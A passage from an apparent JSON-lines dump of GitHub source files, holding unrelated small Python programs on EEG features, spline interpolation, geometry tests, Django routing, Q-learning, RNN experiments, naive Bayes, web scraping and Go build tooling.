10.1007/978-3-540-73044-6_127\n\n \"\"\"\n\n _assert_valid_dict(eeg_dict=eeg_dict, fs=fs, noverlap=noverlap, nfft=nfft, nperseg=nperseg)\n\n channels = array(list(eeg_dict.keys()))\n\n Sxx = transpose(\n\n [estimate_welch(eeg_dict[ch], fs, window, noverlap, nfft, nperseg, fmin, fmax)[1] for ch in channels]\n\n )\n # Order channels = [Fp2 F8 T4 T6 O2 F4 C4 P4 Fz Cz Pz F3 C3 P3 Fp1 F7 T3 T5 O1]\n x = array([0, 2, 2, 2, 1, 1, 1, 1, 0, 0, 0, -1, -1, -1, 0, -2, -2, -2, -1])\n y = array([0, 1, 0, -1, -2, 1, 0, -1, 1, 0, -1, 1, 0, -1, 0, 1, 0, -1, -2])\n\n # Compute euclidean distances from center location Cz\n x_cog = (Sxx @ x) / Sxx.sum(axis=1)\n y_cog = (Sxx @ y) / Sxx.sum(axis=1)\n\n return x_cog, y_cog\n","repo_name":"RobvanderNagel94/pathologylib","sub_path":"features/background/center_of_gravity.py","file_name":"center_of_gravity.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16243698337","text":"def swap(x,y):\n temp = x\n x = y\n y = temp\n return\n\ns2 = []\ne = [] \nd = []\nabcissa = []\nordenada = []\nInfo = 0\n\npontosMax = int(input(\"Insira o numero total de pontos: \"))\nfor i in range(pontosMax):\n abcissa.append(float(input(\"Insira a abcissa do ponto: \" + str(i+1) + \".\\n\")))\n ordenada.append(float(input(\"Insira a ordenada do ponto: \" + str(i+1) + \".\\n\")))\nfor i in range(1,pontosMax): #InsertionSort para ordenar \n for j in range(i):\n if(abcissa[i] < abcissa[j]):\n swap(abcissa[i] , abcissa[j])\n swap(ordenada[i] , ordenada[j])\nOrdenado = True\nif(pontosMax < 3):\n Info = -1\n print(\"\\nNumero de pontos menor que 3.\\n\")\n print(\"Info: \" + str(Info))\n exit\nfor i in range(1,pontosMax):\n Ordenado = Ordenado and abcissa[i-1] < abcissa[i]\nif(not Ordenado):\n Info = -2\n print(\"\\nAbcissas não ordenadas.\\n\")\n print(\"Info: \" + str(Info))\n exit\nfor i in range(pontosMax):\n s2.append(0)\nm = pontosMax - 2\n#Construção do sistema linear tridiagonal simétrico\nHa = abcissa[1] - abcissa[0]\nDeltaa = (ordenada[1] - ordenada[0]) / Ha\nfor i in range(m):\n ip1 = i + 1\n ip2 = i + 2\n Hb = abcissa[ip2] - abcissa[ip1]\n Deltab = (ordenada[ip2] - ordenada[ip1]) / Hb\n e.insert(i,Hb)\n d.insert(i,(2 * (Ha + Hb)))\n s2[ip1] = 6 * (Deltab - Deltaa)\n Ha = Hb\n Deltaa = Deltab\n#Eliminação de gauss\nfor i in range(1,m+1):\n ip1 = i + 1\n im1 = i - 1\n t = e[im1] / d[im1]\n d.insert(i, d[i-1] - (t * e[im1]) )\n s2[ip1] = (s2[ip1] - (t * s2[i-1]))\n#solução por substituições retroativas\ns2[m] = (s2[m] / d[m-1]) # Problema\nfor i in range( m-1, 1, -1):\n ip1 = i + 1\n im1 = i - 1\n s2[i] = (s2[i] - (e[im1] * s2[ip1])) / d[im1]\ns2[0] = 0\ns2[pontosMax-1] = 0 \nprint(\"\\nVetor de derivadas segundas:\\n\")\nprint(s2)\nprint(\"\\nInfo: \" + str(Info))","repo_name":"ar1vit0r/Polynomial-Interpolation","sub_path":"Algoritmo SplineCubicaNatural.py","file_name":"Algoritmo SplineCubicaNatural.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13753791426","text":"from typing import Any\n\nimport pytest\nfrom hypothesis import given\n\nfrom rene import Location\nfrom rene.exact import (Polygon,\n Trapezoidation)\nfrom rene.hints import Seeder\nfrom . import strategies\n\n\n@given(strategies.polygons)\ndef test_basic_default_seeder(polygon: Polygon) -> None:\n result = Trapezoidation.from_polygon(polygon)\n\n assert isinstance(result, Trapezoidation)\n\n\n@given(strategies.polygons, strategies.seeders)\ndef test_basic_custom_seeder(polygon: Polygon, seeder: Seeder) -> None:\n result = Trapezoidation.from_polygon(polygon,\n seeder=seeder)\n\n assert isinstance(result, Trapezoidation)\n\n\n@given(strategies.polygons, strategies.seeders)\ndef test_contains(polygon: Polygon, seeder: Seeder) -> None:\n result = Trapezoidation.from_polygon(polygon,\n seeder=seeder)\n\n assert all(vertex in result for vertex in polygon.border.vertices)\n assert all(vertex in result\n for hole in polygon.holes\n for vertex in hole.vertices)\n\n\n@given(strategies.polygons, strategies.seeders)\ndef test_locate(polygon: Polygon, seeder: Seeder) -> None:\n result = Trapezoidation.from_polygon(polygon,\n seeder=seeder)\n\n assert all(result.locate(vertex) is Location.BOUNDARY\n for vertex in polygon.border.vertices)\n assert all(result.locate(vertex) is Location.BOUNDARY\n for hole in polygon.holes\n for vertex in hole.vertices)\n\n\n@given(strategies.polygons, strategies.invalid_seeds)\ndef test_invalid_seeders(polygon: Polygon,\n invalid_seed: Any) -> None:\n with pytest.raises((OverflowError, TypeError, ValueError)):\n Trapezoidation.from_polygon(polygon,\n seeder=lambda: invalid_seed)\n","repo_name":"lycantropos/rene","sub_path":"tests/exact_tests/trapezoidation_tests/test_from_polygon.py","file_name":"test_from_polygon.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23432919831","text":"from heapq import nlargest\r\n\r\n\r\ndef GetNumber(temp, templist):\r\n list = [t for t in templist if float(temp) < float(t)]\r\n #print(list)\r\n if list: return min(list)\r\n else: return None \r\n\r\nwith open(\"D-large.in\", \"r\") as f:\r\n num_case = int(f.readline())\r\n #lst.append(f.readline().split())\r\n\r\n for n in range(1, num_case + 1):\r\n\r\n numOfblock = int(f.readline())\r\n naomi =(f.readline().split())\r\n ken =(f.readline().split())\r\n\r\n Warnaomi = naomi[:]\r\n Warken = ken[:]\r\n \r\n naomiScore = 0\r\n warScore = 0\r\n\r\n while (naomi and ken):\r\n if(min(naomi) < min(ken)):\r\n #print(\"burn naomi \",min(naomi))\r\n #print(\"burn ken\",max(ken))\r\n naomi.remove(min(naomi))\r\n ken.remove(max(ken))\r\n\r\n elif(min(naomi) > max(ken)):\r\n naomiScore = naomiScore+1\r\n #print(\"burn naomi \",min(naomi))\r\n #print(\"burn ken\",min(ken))\r\n naomi.remove(min(naomi))\r\n ken.remove(min(ken))\r\n \r\n elif(min(naomi)> min(ken)):\r\n naomiScore = naomiScore+1\r\n #print(\"burn naomi \",min(naomi))\r\n #print(\"burn ken\",min(ken))\r\n naomi.remove(min(naomi))\r\n ken.remove(min(ken)) \r\n\r\n else:\r\n print(\"None\") \r\n\r\n while (Warnaomi and Warken):\r\n \r\n if(min(Warnaomi) < min(Warken)):\r\n #print(\"burn naomi \",min(Warnaomi))\r\n #print(\"burn ken\",min(Warken))\r\n Warnaomi.remove(min(Warnaomi))\r\n Warken.remove(min(Warken))\r\n\r\n elif(min(Warnaomi) > min(Warken)):\r\n chosenKen = GetNumber(min(Warnaomi), Warken)\r\n #print(\"ken \" ,min(Warnaomi), chosenKen)\r\n if(chosenKen == None):\r\n warScore = warScore + 1\r\n #print(\"burn naomi \",min(Warnaomi))\r\n #print(\"burn ken\",max(Warken))\r\n Warnaomi.remove(min(Warnaomi))\r\n Warken.remove(min(Warken))\r\n else:\r\n #print(\"burn naomi \",min(Warnaomi))\r\n #print(\"burn ken\",max(Warken))\r\n Warnaomi.remove(min(Warnaomi))\r\n Warken.remove(chosenKen)\r\n\r\n\r\n print(\"Case #{0}: {1} {2}\".format(n, naomiScore, warScore))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1406.py","file_name":"1406.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12958858641","text":"#! python3\r\n# Open spreadsheets and writes the cells into one text file for each columns\r\nimport openpyxl \r\nwb = openpyxl.load_workbook('TextToExcel.xlsx')\r\nsheet = wb.active\r\ncolumn_len = sheet.max_column\r\nrow_len = sheet.max_row\r\n# Harvesting data\r\ndata_bank = {}\r\nfor column in range(1, column_len + 1):\r\n data_bank.update({column:[]})\r\n for row in range(1, row_len + 1):\r\n data_bank[column].append(sheet.cell(row = row, column = column).value)\r\n# Placing the data into .txt files\r\nfor key in data_bank.keys():\r\n open_txt = open('num' + str(key) + '.txt', 'a')\r\n txt = ''\r\n txt = ' '.join(data_bank.get(key))\r\n open_txt.write(txt)\r\n open_txt.close()\r\n","repo_name":"QaisZainon/Learning-Coding","sub_path":"Automate the Boring Stuff/Ch.13 - Working with Excel Spreadsheets/SpreadsheetToTextFiles.py","file_name":"SpreadsheetToTextFiles.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28455418767","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login, logout\nfrom django.views.generic.base import RedirectView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', RedirectView.as_view(url='meraki_inv/', permanent=False)),\n url(r'^accounts/login/', login, \\\n {'template_name': 'meraki_inv/login.html'}, name='login'),\n url(r'^accounts/logout/', logout, \\\n {'next_page': '/meraki_inv/'}, name='logout'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^meraki_inv/', include('meraki_inv.urls', namespace=\"meraki_inv\")),\n)\n","repo_name":"jhanes-meraki/inv","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4381419853","text":"#coding: utf-8\n'''\n爬取煎蛋网上的美女图片\n'''\n\nimport urllib.request\nimport os\nimport os.path\nimport re\nfrom bs4 import BeautifulSoup\nimport json\nimport time\nfrom selenium import webdriver\n\ndef get_page_source(url):\n\t'根据输入的url,以字符串的形式输出网页源代码'\n\tdriver =webdriver.PhantomJS(executable_path=\"D:\\ruanjian\\phantomjs\\phantomjs-2.1.1-windows\\bin\\phantomjs.exe\")#使用下载好的phantomjs,网上也有人用firefox,chrome,但是我没有成功,用这个也挺方便\n\tdriver.set_page_load_timeout(30)\n\ttime.sleep(3)\n\thtml=driver.get(url)#使用get方法请求url,因为是模拟浏览器,所以不需要headers信息 \n\thtml=driver.page_source#获取网页的html数据\n\tsoup=BeautifulSoup(html,'lxml')#对html进行解析,如果提示lxml未安装,直接pip install lxml即可\n\tprint(soup)\n\ndef get_page_num(url):\n\thtml =get_page_source(url).decode('utf-8')\n\ta = html.find(\"current-comment-page\")+23\n\tb = html.find(']',a)\n\tnum =html[a:b]\n\treturn num\n\t\n\t\ndef find_imgs(url):\n\thtml =get_page_source(url).decode('utf-8')\n\tprint(html)\n\t#img_addrs = []\n\t#pa =re.compile(r'
', ServiceUpdateView.as_view(), name='update'),\n path('delete/', ServiceDeleteView.as_view(), name='delete'),\n path('pedido/', views.realizar_pedido, name='detalle_pedido'),\n path('create_pedido/', ServiceCreatePedido.as_view(), name='create_pedido'),\n path('success_pedido/', PedidoSuccess.as_view(), name='success_pedido'),\n], 'services')","repo_name":"ottomontoya/webGameThrones","sub_path":"services/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25740614221","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom preproccess import Dataset\nfrom random import sample, randint\nfrom matplotlib import pyplot as plt\nclass RNN_cell:\n def __init__(self):\n print(\"hello\")\n\n\nclass model_2:\n def __init__(self, dataset: Dataset, feature_sets, p=True):\n self.p = p\n self.dataset = dataset\n self.feature_sets = feature_sets\n self.raw_data = dataset.vec_df_filtered if dataset.vec_df_filtered is not None else dataset.vec_df\n\n\n def organize_input(self):\n inputs = []\n for set in self.feature_sets:\n cols = []\n for col in set:\n cols += [x for x in list(self.raw_data.columns.values) if col in x]\n inputs.append(self.raw_data[cols])\n return inputs\n\n def train_test_split(self, inputs, train_size=0.8):\n train_size = int(self.raw_data.shape[0] * train_size)\n all_idx = list(range(self.raw_data.shape[0]))\n train_idx = sample(all_idx, train_size)\n test_idx = [x for x in all_idx if x not in train_idx]\n X_train = [x.iloc[train_idx].to_numpy() for x in inputs]\n X_test = [x.iloc[test_idx].to_numpy() for x in inputs]\n y_train = self.raw_data.iloc[train_idx]['success'].values\n y_test = self.raw_data.iloc[test_idx]['success'].values\n return np.array(X_train), np.array(X_test), np.array(y_train), np.array(y_test)\n\n def run(self):\n print(max(self.dataset.vocab.values()))\n if self.p: print(\"model 2 running\")\n inputs = self.organize_input()\n X = self.raw_data.drop('success', axis=1).to_numpy()\n X = np.array([[[x] for x in row] for row in X], dtype=float)\n y = self.raw_data['success'].to_numpy(dtype=float)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n # X_train, X_test, y_train, y_test = self.train_test_split(inputs)\n print(X_train.shape)\n rnn_model = tf.keras.models.Sequential()\n # rnn_model.add(tf.keras.layers.Embedding(1000, 10))\n rnn_model.add(tf.keras.layers.SimpleRNN(7))\n rnn_model.add(tf.keras.layers.Dense(1))\n rnn_model.compile(loss='mean_absolute_error', optimizer='adam', metrics=['accuracy'])\n # rnn_model.summary()\n history = rnn_model.fit(X_train, y_train, epochs=100)\n\n res = rnn_model.predict(X_test)\n print(res)\n self.plot_results(history, res, y_test)\n\n def plot_results(self, history, res, y_test):\n print(len(res), len(y_test))\n plt.scatter(range(len(res)), res, c='r')\n plt.scatter(range(len(y_test)), y_test, c='g')\n plt.show()\n plt.plot(history.history['loss'])\n plt.show()\n\n\nclass RNN_model_test:\n def __init__(self):\n path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')\n text = open(path_to_file, 'rb').read().decode(encoding='utf-8')\n print(text[:13])\n vocab = list(dict.fromkeys(sorted(text)))\n char2idx = {u: i for i, u in enumerate(vocab)}\n idx2char = np.array(vocab)\n text_as_int = np.array([char2idx[c] for c in text])\n print('{')\n for char, _ in zip(char2idx, range(20)):\n print(' {:4s}: {:3d},'.format(repr(char), char2idx[char]))\n print(' ...\\n}')\n\n print('{} ---- characters mapped to int ---- > {}'.format(repr(text[:13]), text_as_int[:13]))\n seq_length = 100\n examples_per_epoch = len(text) // (seq_length + 1)\n\n # Create training examples / targets\n char_dataset = tf.data.Dataset.from_tensor_slices(text_as_int)\n for i in char_dataset.take(5):\n print(idx2char[i.numpy()])\n\n sequences = char_dataset.batch(seq_length + 1, drop_remainder=True)\n\n for item in sequences.take(5):\n s = repr(''.join(idx2char[item.numpy()]))\n print(s, len(s))\n print()\n\n dataset = sequences.map(self.split_input_target)\n\n for input_example, target_example in dataset.take(1):\n print('Input data: ', repr(''.join(idx2char[input_example.numpy()])))\n print('Target data:', repr(''.join(idx2char[target_example.numpy()])))\n print()\n\n for i, (input_idx, target_idx) in enumerate(zip(input_example[:5], target_example[:5])):\n print(\"Step {:4d}\".format(i))\n print(\" input: {} ({:s})\".format(input_idx, repr(idx2char[input_idx])))\n print(\" expected output: {} ({:s})\".format(target_idx, repr(idx2char[target_idx])))\n print()\n # Batch size\n BATCH_SIZE = 64\n\n # Buffer size to shuffle the dataset\n # (TF data is designed to work with possibly infinite sequences,\n # so it doesn't attempt to shuffle the entire sequence in memory. Instead,\n # it maintains a buffer in which it shuffles elements).\n BUFFER_SIZE = 10000\n\n dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True)\n\n print(dataset, '\\n')\n\n # Length of the vocabulary in chars\n vocab_size = len(vocab)\n\n # The embedding dimension\n embedding_dim = 256\n\n # Number of RNN units\n rnn_units = 1024\n\n model = self.build_model(\n vocab_size=len(vocab),\n embedding_dim=embedding_dim,\n rnn_units=rnn_units,\n batch_size=BATCH_SIZE)\n\n for input_example_batch, target_example_batch in dataset.take(1):\n example_batch_predictions = model(input_example_batch)\n print(example_batch_predictions.shape, \"# (batch_size, sequence_length, vocab_size)\")\n\n model.summary()\n\n sampled_indices = tf.random.categorical(example_batch_predictions[0], num_samples=1)\n sampled_indices = tf.squeeze(sampled_indices, axis=-1).numpy()\n\n print(sampled_indices)\n\n print(\"Input: \\n\", repr(\"\".join(idx2char[input_example_batch[0]])))\n print()\n print(\"Next Char Predictions: \\n\", repr(\"\".join(idx2char[sampled_indices])))\n\n @ staticmethod\n def build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim,\n batch_input_shape=[batch_size, None]),\n tf.keras.layers.GRU(rnn_units,\n return_sequences=True,\n stateful=True,\n recurrent_initializer='glorot_uniform'),\n tf.keras.layers.Dense(vocab_size)\n ])\n return model\n\n @ staticmethod\n def split_input_target(chunk):\n input_text = chunk[:-1]\n target_text = chunk[1:]\n return input_text, target_text\n\n\nclass RNN_model_test_2:\n def __init__(self):\n data = [[[(i + j)] for i in range(2, 7)] for j in range(100)]\n target = [1 if any([sum([y[0] for y in x]) % j == 0 for j in [3, 4]]) else 0 for x in data]\n data = np.array(data, dtype=float)\n target = np.array(target, dtype=float)\n print(data)\n print(target)\n print(data.shape)\n print(target.shape)\n x_train, x_test, y_train, y_test = train_test_split(data, target, test_size=0.2, random_state=4)\n m = tf.keras.models.Sequential()\n m.add(tf.keras.layers.Embedding(1000, 5))\n m.add(tf.keras.layers.SimpleRNN(1, batch_input_shape=(None, 5, 1), return_sequences=True))\n m.add(tf.keras.layers.SimpleRNN(1, return_sequences=False))\n m.compile(loss='mean_absolute_error', optimizer='adam', metrics=['accuracy'])\n m.summary()\n history = m.fit(x_train, y_train, epochs=500)\n res = m.predict(x_test)\n res = [1 if x >= 0.5 else 0 for x in res]\n print(res)\n plt.scatter(range(20), res, c='r')\n plt.scatter(range(20), y_test, c='g')\n plt.show()\n plt.plot(history.history['loss'])\n plt.show()\n","repo_name":"Silber93/ML_poject","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43840524010","text":"a, t = map(int, input().split())\n\nfrom random import randrange\n\nfor _ in range(t):\n\te = input().split()\n\ts = ''.join(e[1:])\n\ttot = 0\n\tz = [0 for _ in range(len(s))]\n\tl = -1\n\tr = -1\n\tfor i in range(1, len(s)):\n\t\tz[i] = 0 if i>=r else min(r-i, z[i-l])\n\t\twhile (i + z[i] < len(s) and s[i+z[i]] == s[z[i]]):\n\t\t\tz[i]+=1\n\t\tif (i+z[i] > r):\n\t\t\tl = i\n\t\t\tr = i + z[i]\n\tprint(z)\n\tfor _ in range(10000):\n\t\tt = ''\n\t\ti = 0\n\t\twhile(len(t) < len(s) or t[-len(s):] != s):\n\t\t\ti += 1\n\t\t\tt += ( chr(ord('0') + randrange(1, a+1)) )\n\t\ttot += i\n\tprint(tot/10000)","repo_name":"ablondal/comp-prog","sub_path":"Practice/NAPC_Practice_Week_1/singland.py","file_name":"singland.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41606099713","text":"import gym\r\nimport random\r\nimport numpy as np\r\n\r\nenv = gym.make(\"FrozenLake-v1\", render_mode=\"rgb_array\")\r\nenv.reset()\r\n# assigns rows(states) and columns(actions)\r\nrows = env.observation_space.n\r\ncols = env.action_space.n\r\nqTable = np.zeros((rows, cols))\r\n# how easily agent accepts new info\r\nlearningRate = 0.8\r\n# how much long term rewards should be valued in comparison to short term\r\ndiscountFactor = 0.8\r\nepsilon = 0.85\r\ndecreasingRate = 0.005\r\nepisodes = 1000\r\nsteps = 100\r\n\r\nfor episode in range(episodes):\r\n truncated = False\r\n terminated = False\r\n state = env.reset()[0]\r\n for step in range(steps):\r\n # determines whether agent explores or exploits\r\n if random.uniform(0, 1) < epsilon:\r\n action = env.action_space.sample()\r\n else:\r\n action = np.argmax(qTable[state, :])\r\n newState, reward, truncated, terminated, _ = env.step(action)\r\n qTable[state, action] = qTable[state, action] + learningRate * \\\r\n (reward + discountFactor * np.max(qTable[newState, :]) - qTable[state, action])\r\n print(f\"Step: {step} of episode {episode}\")\r\n state = newState\r\n if truncated or terminated:\r\n break\r\n epsilon = np.exp(-decreasingRate * episode)\r\n print(f\"Epsilon: {epsilon}\")\r\n\r\nenv = gym.make(\"FrozenLake-v1\", render_mode=\"human\")\r\nepisodes1 = 10\r\nfor episode1 in range(episodes1):\r\n score = 0\r\n step = 0\r\n state = env.reset()[0]\r\n truncated = False\r\n terminated = False\r\n while not(truncated or terminated):\r\n print(f\"Step: {step}\")\r\n action = np.argmax(qTable[state, :])\r\n newState, reward, truncated, terminated, _ = env.step(action)\r\n score += reward\r\n env.render()\r\n print(f\"Score = {score}\")\r\n state = newState\r\n step += 1\r\nenv.close()\r\n","repo_name":"jakethehoffer/onboarding","sub_path":"lake.py","file_name":"lake.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18278917494","text":"from sklearn.datasets.samples_generator import make_blobs;\r\nimport matplotlib.pyplot as plt;\r\nfrom sklearn.svm import SVC; # \"Support Vector Classifier\"\r\nimport numpy as np;\r\nimport random;\r\nimport pickle;\r\n\r\n\r\n\r\n\r\nclass naive_bayes:\r\n #features_type is an array storing a string of each feature's type\r\n def __init__(self,num_features, num_classes):\r\n self.n_features = num_features;\r\n self.num_classes = num_classes;\r\n self.P = [[{} for i in range(0,self.n_features)] for j in range(0,self.num_classes)];\r\n self.class_count = [0 for i in range(0,num_classes)];\r\n\r\n # Y-values are in [k] - 1 (namely integer values)\r\n def train(self,X,Y):\r\n nc = self.num_classes;\r\n nf = self.n_features;\r\n\r\n m = len(X);\r\n for i in range(0,m):\r\n row = X[i];\r\n val = Y[i];\r\n\r\n self.class_count[val] += 1;\r\n for j in range(0,nf):\r\n\r\n t1 = row[j];\r\n map = self.P[val][j];\r\n if t1 not in map:\r\n map[t1] = 0;\r\n map[t1] += 1;\r\n\r\n\r\n def predict(self,X):\r\n result = [];\r\n m = len(X);\r\n nc = self.num_classes;\r\n nf = self.n_features;\r\n\r\n for i in range(0,m):\r\n row = X[i];\r\n max_prob = -1;\r\n best_choice = -1;\r\n\r\n for j in range(0,nc):\r\n temp = (float)(self.class_count[j]) / (float)(m);\r\n for k in range(0,nf):\r\n val = row[k];\r\n map = self.P[j][k];\r\n if val not in map:\r\n temp = 0;\r\n else:\r\n temp *= (float) (map[val]) / (float) (self.class_count[j]);\r\n\r\n if temp >= max_prob:\r\n max_prob = temp;\r\n best_choice = j;\r\n\r\n assert(best_choice != -1);\r\n result.append(best_choice);\r\n\r\n return np.array(result);\r\n\r\ndef evaluate_accuracy(Y_pred,Y_true):\r\n n = len(Y_pred);\r\n count = 0;\r\n for i in range(0,n):\r\n if Y_pred[i] != Y_true[i]:\r\n count += 1;\r\n return 1 - (float) (count) / (float) (n);\r\n\r\ndef train_test_split(X,Y,frac):\r\n if frac > 1 or frac <= 0:\r\n raise Exception('Improper Value for frac');\r\n m = len(X);\r\n k = (int) (frac * m);\r\n S = random_subset(m,k);\r\n Sc = [];\r\n for i in range(0,m):\r\n if i not in S:\r\n Sc.append(i);\r\n\r\n return np.array([X[i] for i in S]) , np.array([Y[i] for i in S]) , np.array([X[i] for i in Sc]) , np.array([Y[i] for i in Sc]);\r\n\r\ndef random_subset(n,k):\r\n if k <= 0 or n <= 0:\r\n print(\"k must be >= 0\");\r\n return [];\r\n\r\n if k >= n:\r\n return [i for i in range(0,n)];\r\n\r\n result = [0 for i in range(0,k)];\r\n\r\n temp = [i for i in range(0,n)];\r\n\r\n for i in range(0,k):\r\n p = random.uniform(0,1);\r\n j = (int)((n-i) * p);\r\n t1 = temp[j];\r\n temp2 = [0 for i in range(0,n-i-1)];\r\n for i1 in range(0,j):\r\n temp2[i1] = temp[i1];\r\n for i2 in range(j+1,n-i):\r\n temp2[i2-1] = temp[i2];\r\n temp = temp2;\r\n result[i] = t1;\r\n return list(np.sort(result));\r\n\r\ndef main():\r\n infile = open(\"C:\\\\gmail_api\\\\read_data.txt\",'rb')\r\n XT = pickle.load(infile)\r\n infile.close()\r\n infile = open(\"C:\\\\gmail_api\\\\unread_data.txt\",'rb')\r\n XF = pickle.load(infile)\r\n infile.close()\r\n Y = [1 for i in range(0,len(XT))];\r\n for row in XF:\r\n XT.append(row);\r\n Y.append(0);\r\n X = XT;\r\n\r\n Xtrain, Ytrain, Xtest, Ytest = train_test_split(X,Y,frac=0.8);\r\n\r\n bayes = naive_bayes(num_features=5,num_classes=3);\r\n bayes.train(Xtrain,Ytrain);\r\n\r\n\r\n Ypred = bayes.predict(Xtest);\r\n\r\n acc = evaluate_accuracy(Ypred,Ytest);\r\n print(acc);\r\n\r\nif __name__ == '__main__':\r\n main();\r\n","repo_name":"pd451/Machine-Learning","sub_path":"ML/Naive Bayes/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38382766991","text":"import shlex\nimport textwrap\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple\n\nfrom pants.backend.go.distribution import GoLangDistribution\nfrom pants.core.util_rules.external_tool import DownloadedExternalTool, ExternalToolRequest\nfrom pants.engine.fs import CreateDigest, Digest, FileContent, MergeDigests\nfrom pants.engine.internals.selectors import Get\nfrom pants.engine.platform import Platform\nfrom pants.engine.process import BashBinary, Process\nfrom pants.engine.rules import collect_rules, rule\nfrom pants.util.logging import LogLevel\n\n\n@dataclass(frozen=True)\nclass GoSdkProcess:\n input_digest: Digest\n command: Tuple[str, ...]\n description: str\n working_dir: Optional[str] = None\n output_files: Tuple[str, ...] = ()\n output_directories: Tuple[str, ...] = ()\n\n\n@rule\nasync def setup_go_sdk_command(\n request: GoSdkProcess,\n goroot: GoLangDistribution,\n bash: BashBinary,\n) -> Process:\n downloaded_goroot = await Get(\n DownloadedExternalTool,\n ExternalToolRequest,\n goroot.get_request(Platform.current),\n )\n\n working_dir_cmd = f\"cd '{request.working_dir}'\" if request.working_dir else \"\"\n\n # Note: The `go` tool requires GOPATH to be an absolute path which can only be resolved from within the\n # execution sandbox. Thus, this code uses a bash script to be able to resolve absolute paths inside the sandbox.\n script_digest = await Get(\n Digest,\n CreateDigest(\n [\n FileContent(\n \"__pants__.sh\",\n textwrap.dedent(\n f\"\"\"\\\n export GOROOT=\"$(/bin/pwd)/go\"\n export GOPATH=\"$(/bin/pwd)/gopath\"\n export GOCACHE=\"$(/bin/pwd)/cache\"\n /bin/mkdir -p \"$GOPATH\" \"$GOCACHE\"\n {working_dir_cmd}\n exec \"${{GOROOT}}/bin/go\" {' '.join(shlex.quote(arg) for arg in request.command)}\n \"\"\"\n ).encode(\"utf-8\"),\n )\n ]\n ),\n )\n\n input_root_digest = await Get(\n Digest,\n MergeDigests([downloaded_goroot.digest, script_digest, request.input_digest]),\n )\n\n return Process(\n argv=[bash.path, \"__pants__.sh\"],\n input_digest=input_root_digest,\n description=request.description,\n output_files=request.output_files,\n output_directories=request.output_directories,\n level=LogLevel.DEBUG,\n )\n\n\ndef rules():\n return collect_rules()\n","repo_name":"williamscs/pants","sub_path":"src/python/pants/backend/go/sdk.py","file_name":"sdk.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"36025460683","text":"import json\nfrom math import ceil\nfrom typing import Dict, List\n\nfrom openpyxl import Workbook\nfrom openpyxl.utils import get_column_letter\nfrom openpyxl.worksheet.table import Table, TableStyleInfo\n\nfrom arbitrageur.crafting import ProfitableItem, profit_per_item, profit_on_cost, profit_per_crafting_step\nfrom arbitrageur.items import Item\nfrom arbitrageur.recipes import Recipe, ITEM_STACK_SIZE\n\nimport csv\nfrom logzero import logger\n\n\ndef format_disciplines(disciplines: List[str]) -> str:\n # Returns the first letter of each discipline, except for Armorsmith (Am) & Artificer (At)\n return \"/\".join([e[0] if e[0] != 'A' else e[:3:2] for e in disciplines])\n\n\ndef format_json_recipe(profitable_item, items_map):\n logger.debug(\n f\"\"\"Shopping list for {profitable_item.count} x {items_map[profitable_item.id].name} = {profitable_item.profit} profit ({profit_per_crafting_step(profitable_item)} / step) :\"\"\")\n\n recipe = {}\n for ingredient_id, purchased_ingredient in profitable_item.purchased_ingredients.items():\n ingredient_count = ceil(purchased_ingredient.count)\n if ingredient_count < ITEM_STACK_SIZE:\n ingredient_count_msg = str(ingredient_count)\n else:\n stack_count = ingredient_count // ITEM_STACK_SIZE\n remainder = ingredient_count % ITEM_STACK_SIZE\n if remainder != 0:\n remainder_msg = f\"\"\" + {remainder}\"\"\"\n else:\n remainder_msg = \"\"\n\n ingredient_count_msg = f\"\"\"{ingredient_count} ({stack_count} x {ITEM_STACK_SIZE}{remainder_msg})\"\"\"\n\n ingredient_name = items_map[ingredient_id].name\n logger.debug(\n f\"\"\"{ingredient_count_msg} {ingredient_name} ({ingredient_id}) for {purchased_ingredient.cost}\"\"\")\n\n recipe[f\"\"\"{ingredient_count_msg} {ingredient_name}\"\"\"] = purchased_ingredient.listings\n return recipe\n\n\ndef generate_export_rows(items_map, 